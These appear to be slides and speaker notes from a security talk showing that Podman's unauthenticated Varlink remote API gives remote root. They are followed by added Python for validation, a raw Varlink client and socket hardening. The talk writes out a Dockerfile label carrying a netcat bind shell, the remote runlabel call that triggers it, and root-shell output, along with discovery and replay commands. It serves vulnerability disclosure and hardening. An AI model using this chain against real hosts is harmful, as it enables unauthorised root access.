• It does a lot of stuff, but let’s focus on how it fits with Podman
• Podman integrated Varlink to provide its “remote API” functionality
Reference: http://www.projectatomic.io/blog/2018/05/podman-varlink/
9. What is Podman?
• Lots of local podman commands map to varlink remote API methods
• https://github.com/containers/libpod/tree/master/cmd/podman
• https://github.com/containers/libpod/tree/master/pkg/varlinkapi
• Also not much public security research on it
• Only one CVE so far
• https://www.cvedetails.com/cve/CVE-2018-10856/
Reference: https://github.com/containers/libpod/
11. Together by default on Fedora Server
• Podman + Varlink installed out of the box instead of Docker
• Also rumored that RHEL8 will have Podman too
• RedHat and Fedora folks seem to really like it
• Remote services aren’t running by default AFAIK yet
• They can be configured to run in different ways, and some projects want or support setups that listen over the network
Reference: https://dwalsh.fedorapeople.org/ReplacingDockerWithPodman.pdf
12. Focus and !focus
• Focus
• Podman (1.4/1.5) + Varlink integration
• Remote APIs
• Local or remote privilege escalation on the HOST
• !focus
• Container escapes, although these are cool too
13. So how do I run this thing?
Reference: https://github.com/containers/libpod/issues/3344
14. Attack Surface
• podman local process running as root
• ACLs say whether an unprivileged user can talk to it or not
21. How do I test this thing?
• dnf install python3-varlink
References:
https://varlink.org/python/
https://blog.tomecek.net/post/recent-news-in-container-tech/
25. Uh what’s a label?
Reference: https://podman.io/blogs/2018/12/03/podman-runlabel.html
26. Ok create a cool Dockerfile
FROM busybox
LABEL run="nc -l -p 10000 -e /bin/bash"
$ docker build -t imageX .
or other stuff for your reverse jazz…
References:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes.pdf
27. And setup a private docker registry to host it
$ docker-compose up
$ docker tag image localhost:5000/imageX
$ docker push localhost:5000/imageX
(edit /etc/containers/registries.conf for testing)
[registries.insecure]
registries = ['docker-registry:5000']
32. So that means…
• Running podman as root
• You get root
• Running podman as rootless
• You get…. somebody
33. So how about that remote API?
# podman --log-level debug varlink --timeout=0 tcp:0.0.0.0:6000
DEBU[0000] Using varlink socket: tcp:0.0.0.0:6000
DEBU[0000] Initializing boltdb state at
/var/lib/containers/storage/libpod/bolt_state.db
DEBU[0000] Using graph driver overlay
DEBU[0000] Using graph root /var/lib/containers/storage
…..
34. So how about that remote API?
$ varlink call tcp:podman-host:6000/io.podman.ContainerRunlabel
'{"Runlabel": {"image":"docker-registry:5000/image3", "label":"run"}}'
37. So how about that remote API?
(what we see server side)
…..
DEBU[0312] parsed reference into
"[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.
mountopt=nodev,metacopy=on]docker-registry:5000/image3:latest"
DEBU[0312] parsed reference into
"[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.
mountopt=nodev,metacopy=on]@7276ba03be37ab344f17a.…"
DEBU[0312] exporting opaque data as blob
"sha256:7276ba03be37ab344f17a…."
38. All good ;-]
$ nc podman-host 10000
id
uid=0(root) gid=0(root) groups=0(root)
context=unconfined_u:system_r:container_runtime_t:s0-s0:c0.c1023
ls /root
anaconda-ks.cfg
original-ks.cfg
39. Now time for a quick recap
“DO NOT CONFIGURE YOUR PODMAN WITHOUT AUTH”
There is remote-client now (uses SSH), which makes this easier and may become the standard way of doing things
Reference: https://github.com/containers/libpod/blob/b32cb4b750842212f8002e030db63e92c6485fdc/docs/tutorials/remote_client.md
40. Insecure configs
• Listening as a privileged user on a unix socket with an open ACL
• E.g. unix:/run/blah where access isn’t restricted
Result: local command execution
Reference: https://docs.rs/varlink/8.1.0/varlink/
43. Podman is …. new
• Like 2017ish (?) new
• Similar introduction for Varlink actually
• We really don’t know how or where it will be deployed
• What weird secure or insecure ways admins will want to use it
• But there’s an opportunity to get security right before it takes off
44. And there’s an appetite for remote stuff
Reference: https://github.com/containers/libpod/issues/935
45. Are devs using it like this?
• Gopodman
• Podman Varlink API client in Go
• And it was built for this exact purpose
Reference: https://github.com/praveenkumar/gopodman
49. Are there any docs telling you not to?
• Not that I know of :’)
• The Podman project should explicitly document and make known the risk that the remote API over plain TCP is insecure, especially given the set of APIs available
• Hopefully this research will make a positive impact
50. What about SSH?
• It does provide advantages over plain Varlink over TCP such as encrypted connections, a built-in auth gateway, etc.
• There’s some docs on how to use it… “securely” (?)
Reference: https://podman.io/blogs/2019/01/16/podman-varlink.html
51. Varlink bridge mode
• Bridge + SSH auth > running it over TCP /w no auth
• But not everyone is doing it this way
Reference: https://varlink.org/FAQ.html
52. And Varlink isn’t in the business of auth
Reference: https://varlink.org/FAQ.html
53. Return of Remote API: Trivial API crashes
• Would be a remote DoS of podman, and some may still work in current releases
Reference: https://github.com/containers/libpod/issues?utf8=%E2%9C%93&q=is%3Aissue+api+crash
54. Interesting APIs
• Here’s a few that made the list
• ImportImage(), LoadImage(), RemoveImage(), SearchImages()
• Also some need an “upgraded connection”
• Attach(), SendFile(), ReceiveFile(), etc
• Probably some fun stuff to do there
Reference: https://varlink.org/FAQ.html
57. Even better…
• By appending '/' onto search queries, it parses this to mean we’re talking to a registry
• And after best-effort concatenations….
58. Let’s try some stuff
> dir traversal for arbitrary cert
consumption
> get server to read arbitrary
local files
> internal/external port scan
59. Lots of… other code
• Actually part of the code being executed here is in a different project
• https://github.com/containers/image/blob/master/pkg/tlsclientconfig/tlsclientconfig.go#L20
• https://github.com/containers/libpod/blob/master/pkg/registries/registries.go
attack surface++
60. So like various blind file reads, port scan, etc
• Undesired behavior for sure… but more like white elephant bugs without a full exploit chain
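Slides 57 to 60 describe the bug class (a caller-controlled registry string, taken from a search query, concatenated onto local certificate lookup paths) but not the code itself. The block below is an added illustration of that class next to the check that closes it; it is not the containers/image or libpod code and is constructed for this page. Assumptions: CERTS_ROOT stands in for the per-registry certificate directory (/etc/containers/certs.d is the usual default, used here only as the example root), and _REGISTRY_RE is a deliberately strict host[:port] syntax for the example (the real reference parser is more permissive, e.g. bracketed IPv6).

```python
import os
import re

# Assumed root for the example: the per-registry TLS material directory that
# the registry client consults (certs.d/<registry host[:port]>/...).
CERTS_ROOT = "/etc/containers/certs.d"

# Deliberately strict host[:port] syntax for the example: no slashes, no '..',
# no empty labels. (The real reference parser accepts more, e.g. bracketed IPv6.)
_REGISTRY_RE = re.compile(
    r"^(?=.{1,253}$)"                                  # overall length
    r"[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"         # first label
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*"    # further labels
    r"(:[0-9]{1,5})?$"                                 # optional port
)

def certs_dir_unchecked(registry):
    """Constructed 'before': trusts the caller's registry string and joins it onto the
    root, so '..' segments walk out of CERTS_ROOT and whatever lives there gets read."""
    return os.path.normpath(os.path.join(CERTS_ROOT, registry))

def certs_dir_checked(registry):
    """Hardened lookup: validate the syntax, then confirm the resolved path is still
    below CERTS_ROOT before any file under it is opened."""
    if not _REGISTRY_RE.match(registry):
        raise ValueError("not a registry host[:port]: %r" % registry)
    if ":" in registry and int(registry.rsplit(":", 1)[1]) > 65535:
        raise ValueError("port out of range: %r" % registry)
    candidate = os.path.normpath(os.path.join(CERTS_ROOT, registry))
    if os.path.commonpath([CERTS_ROOT, candidate]) != CERTS_ROOT:
        raise ValueError("resolved outside the certs root: %r" % candidate)
    return candidate

def escapes_root(path, root=CERTS_ROOT):
    """True if a computed path lies outside root (for reviewing other call sites)."""
    return os.path.commonpath([root, os.path.normpath(path)]) != root

def rejects(registry):
    """True if the hardened lookup refuses the string (keeps tests table-driven)."""
    try:
        certs_dir_checked(registry)
    except ValueError:
        return True
    return False
```

The syntax check alone is what stops the "port scan" variant too: a registry string is only ever a host and a port, so anything carrying a path, a scheme or a second host is refused before a connection or a file read is attempted.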
61. More stuff?
• Crash on malformed API call (looks like null ptr deref; fixed in 1.5.1)
62. More stuff?
• Panic due to likely trying to operate on data that isn’t there
• Simple empty or missing ‘name’ parameter, or invalid name, etc…
• Other variants too, kinda hard to not crash the server using this API
65. Testing these issues
$ sudo dnf install python3-podman-api
(or python3-varlink works too)
• But it doesn’t support every single API that we need
67. “Live”
• We can capture with socat to save the raw API call and then replay it (point the client at port 7000; -v dumps the traffic)
$ socat -v TCP-LISTEN:7000,fork TCP:localhost:6000
{"method":"io.podman.ContainerRunlabel","parameters":{"Runlabel":{"image":"docker-registry:5000/image3","label":"run"}}}
^^ and then just send it over a regular socket + NULL byte (per spec)
69. Sharing this data with folks
• Took a little time to find the right people to talk to about the bugs
• Now there is a documented security@ email DL for security comms, but I was recommended to send the details to RedHat directly
• Initial response re: the runlabel API was that they believed it was working as designed….
• Yes, but when you run the Remote API w/o auth it works unintendedly very well for everyone
• Expecting some more bug fixes for the API issues and updated docs and/or runtime flags to mitigate the risks of insecure Remote API setups
• At least one crash already fixed in 1.5.1
70. Discovery
• Look for UNIX sockets you can connect to with a Varlink client
$ lsof -U
• Look for loopback or network services that speak the protocol
$ echo -ne "{}\0" | nc localhost 6000
{"parameters":{"parameter":"method"},"error":"org.varlink.service.InvalidParameter"}
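The wire protocol behind the `varlink call` on slide 34, the socat replay on slide 67 and the `{}` discovery probe above is just NUL-terminated JSON, so it can be driven from a plain socket without the python3-varlink package. The block below is an added example, not code from the talk or from the varlink/podman projects: `encode_call` and `recv_message` implement the framing (`send_raw(addr, encode_call(method, params))` is what `varlink call` does), `probe` reproduces the `{}` trick and classifies the answer, and `replay` resends a socat capture. `start_stub_server` is a constructed stand-in that only mimics the `org.varlink.service.InvalidParameter` reply and echoes method names so the helpers can be exercised offline; it is not podman, and feeding it non-JSON simply ends its thread. Against a real listener use `tcp`-style `host:port` or `unix:/path` addresses.

```python
import json
import socket
import threading

# Varlink wire format: one JSON object per message, terminated by a NUL byte.
NUL = b"\x00"

# Constructed copy of the call the slides capture with socat (the NUL is not shown).
CAPTURED_CALL = (b'{"method":"io.podman.ContainerRunlabel","parameters":'
                 b'{"Runlabel":{"image":"docker-registry:5000/image3","label":"run"}}}')

def encode_call(method, parameters=None):
    """Build a NUL-terminated varlink call message."""
    msg = {"method": method}
    if parameters is not None:
        msg["parameters"] = parameters
    return json.dumps(msg, separators=(",", ":")).encode() + NUL

def recv_message(sock):
    """Read one message: the bytes before the first NUL (b'' if the peer hangs up)."""
    buf = b""
    while NUL not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            return b""
        buf += chunk
    return buf.split(NUL, 1)[0]

def classify_reply(reply):
    """Discovery heuristic: an org.varlink.service.* error proves the peer speaks varlink."""
    if not isinstance(reply, dict):
        return "not-varlink"
    err = reply.get("error")
    if isinstance(err, str) and err.startswith("org.varlink.service."):
        return "varlink-error"
    if "parameters" in reply and "error" not in reply:
        return "varlink-reply"
    return "not-varlink"

def send_raw(address, payload, timeout=5.0):
    """Connect to 'host:port' or 'unix:/path', send a NUL-terminated payload, parse the reply."""
    if address.startswith("unix:"):
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect(address[len("unix:"):])
    else:
        host, port = address.rsplit(":", 1)
        sock = socket.create_connection((host, int(port)), timeout=timeout)
    try:
        sock.sendall(payload)
        raw = recv_message(sock)
    finally:
        sock.close()
    return json.loads(raw.decode()) if raw else None   # None: closed without answering

def replay(address, captured):
    """Replay a socat capture, adding the NUL terminator the capture does not show."""
    return send_raw(address, captured.rstrip(NUL) + NUL)

def probe(address, timeout=2.0):
    """Discovery: send the bare '{}' message from the slide and classify the answer."""
    try:
        return classify_reply(send_raw(address, b"{}" + NUL, timeout))
    except OSError:
        return "no-service"
    except ValueError:                  # something answered, but not with JSON
        return "not-varlink"

def start_stub_server():
    """Constructed stand-in for a varlink service (NOT podman), so the helpers above can
    run offline: no 'method' -> the InvalidParameter error from the slide, otherwise the
    method name is echoed back. Returns (address, stop_function)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)                 # so the accept loop notices stop()
    stopping = threading.Event()
    def handle(conn):
        with conn:
            raw = recv_message(conn)
            first = json.loads(raw.decode()) if raw else None
            if isinstance(first, dict) and "method" in first:
                reply = {"parameters": {"echo": first["method"]}}
            else:
                reply = {"parameters": {"parameter": "method"},
                         "error": "org.varlink.service.InvalidParameter"}
            conn.sendall(json.dumps(reply).encode() + NUL)
    def serve():
        while not stopping.is_set():
            try:
                handle(srv.accept()[0])
            except socket.timeout:
                continue
    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    def stop():
        stopping.set()
        thread.join()
        srv.close()
    return "127.0.0.1:%d" % srv.getsockname()[1], stop
```

Note that `probe` needs no knowledge of the interface: any service built on the varlink libraries answers a message without `method` with the same `org.varlink.service.InvalidParameter` error, which is exactly why the one-liner with nc works for discovery.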
73. Hardening
• ACLs
• Choose the mode appropriately on registration (the more restrictive the better)
• Prefer the more locked-down /run directory over less restricted ones (not /tmp)
• Privileges
• Run services (or even the resolver service) as lower-privileged users if possible (instead of root)
• If not rootless, drop privileges when doing serious stuff with APIs
74. Hardening
• Remote access
• Do not run Podman over native Varlink using only TCP
• Use SSH (key + password) related methods to protect the connection and provide auth so not just anyone can pwn ‘n own
• Understand that even /w remote auth, local users may still be able to hit APIs
• Try to always run rootless to mitigate impact of bugs
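An added example of the ACL points in the two hardening slides, not code from the talk or from Podman: `bind_service_socket` registers a unix socket the restrictive way (a tight umask around bind, an explicit final mode, an optional dedicated group), `audit_socket` flags the world-accessible node and shared-temp-directory cases, and `audit_listen_address` sorts the `podman varlink <address>` forms by what they expose. The `io.podman` socket name, the 0660 default and the temp directory used by `demo` are assumptions for the illustration; privilege dropping is left out because it depends on the service.

```python
import os
import socket
import stat
import tempfile

def bind_service_socket(path, mode=0o660, gid=None):
    """Register a unix socket the restrictive way: a tight umask around bind() so the
    node never exists with open permissions, an explicit final mode, and optionally a
    dedicated group that may connect (connect() needs write permission on the node)."""
    if os.path.lexists(path):
        os.unlink(path)
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    old_umask = os.umask(0o177)             # bind() creates the node as 0600
    try:
        srv.bind(path)
    finally:
        os.umask(old_umask)
    os.chmod(path, mode)
    if gid is not None:
        os.chown(path, -1, gid)
    srv.listen(5)
    return srv

def audit_socket(path):
    """ACL findings a reviewer would raise for an existing socket node ([] = fine)."""
    st = os.lstat(path)
    if not stat.S_ISSOCK(st.st_mode):
        return ["not a socket"]
    findings = []
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        findings.append("world-accessible (mode %o)" % mode)
    parent = os.path.dirname(os.path.abspath(path))
    if stat.S_IMODE(os.stat(parent).st_mode) & stat.S_IWOTH:
        findings.append("parent directory is world-writable (use /run, not /tmp)")
    return findings

def audit_listen_address(address):
    """Classify an address of the form passed to 'podman varlink <address>'."""
    if address.startswith("unix:"):
        return "unix socket: protected only by the filesystem ACL on the node"
    if address.startswith("tcp:"):
        host = address[len("tcp:"):].rsplit(":", 1)[0]
        if host in ("127.0.0.1", "::1", "[::1]", "localhost"):
            return "tcp on loopback: no auth, every local user can call the API"
        return "tcp on a network interface: no auth, anyone reaching the port acts as the service"
    return "unknown address type"

def demo():
    """Run the checks against a socket in a private temp dir: as registered, after the
    'open ACL' chmod 0666, and after the directory itself is opened up like /tmp."""
    tmp = tempfile.mkdtemp()
    path = os.path.join(tmp, "io.podman")   # socket name assumed for the example
    srv = bind_service_socket(path)
    try:
        as_registered = audit_socket(path)
        os.chmod(path, 0o666)
        open_acl = audit_socket(path)
        os.chmod(tmp, 0o1777)
        open_dir = audit_socket(path)
    finally:
        srv.close()
        os.unlink(path)
        os.rmdir(tmp)
    return as_registered, open_acl, open_dir
```

The umask step matters more than it looks: bind() creates the node with the process umask applied, so a service that binds first and chmods later leaves a window in which a local user can connect before the mode is tightened. Keep in mind that none of these file checks help if the process that owns the socket is root and the API lets callers run commands; that is the "you get root" case from slide 32, and only rootless operation or privilege dropping changes it.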
75. Conclusion
• Varlink and Podman are still pretty new and need more research
• Security maturity will come with time, hardening efforts and more audits
• Code to test the found issues to be released shortly
• Things can only get better
• For now, if you’re building systems with them, remember to isolate + auth
• More fixes and better security documentation to come
• https://github.com/containers/libpod/commits/master
Reference: https://github.com/containers/libpod/commit/080abfd22228bcc2b254d76aea0636642dd6bccd
Start a server listening on a local socket, loopback or on the network
Like Docker… same CLI, but different design
Written in Go, at least libpod is Go
1.4.4-4.fc30
1.5.1-3.fc30
Sudo make me a sandwich, cool
Could be listening as root, could be any user as long as they have bind perms for that port
So either way, not a small number of target APIs
Now there’s some python libraries to help
Or just command line
Container metadata basically
Even though we’re running commands on the host and not in a container, it’s already started setting up the environment for a container
And since I didn’t mount a fs/volume/etc, it’s probably just dropping us into the host filesystem
Slight difference
Slight difference
Run the server
Issue the call as a remote client
To make sure it’s available locally for Podman to use
Now we’ve pulled down a container image, ran a label and got a root shell all remotely
In case that wasn’t clear already
Some documentation suggests unrestricted access when setting up varlink server instances…
So we can exploit Podman via Gopodman’s documented insecure config
Creates tunnel for stdin/stdout to call methods
It’s a protocol, auth is left to whoever is deploying it… not saying that’s right or wrong
Searching the libpod github for API issues
Haven’t dug into the upgraded connection ones, but there’s probably some interesting stuff there too
If you’re talking to a registry, it also tries to look for certs on the local filesystem
If you import code from somewhere else, it’s now “your code”
Reference: https://github.com/containers/libpod/blob/master/vendor/modules.txt
But there’s definitely a lack of input validation and trusting parameters coming in that allows unintended things like this to happen
/dev/null is not the problem here, some buffer calculation error probably, but unlikely a buffer overflow cause it’s in Go and it’s a panic on some null ptr thing
We can attach to podman with gdb here but… it’s a little awkward and I guess has a learning curve to use on Go compiled code
Uhhh… is it supposed to be removing “similar” names or just exact ones? Also, an empty volume name removes the first one in alphabetical order?? Might be a functional bug here if nothing else
If you CreateVolumes, I’m pretty sure it doesn’t start making you them in alphabetical order…
Again, this stuff is new
“It’s always a good time to get pickled” – sorry, inside joke
But that’s ok, we’ll do it live
Again this is a shell on the host, not the container, probably due to us not mounting volumes or anything when we’re running the label within the container execution environment
So how do you find varlink services
Check out all the methods a service exposes
This *may* be the first security talk on either of them, and I hope this has been helpful, but I also hope it’s not the last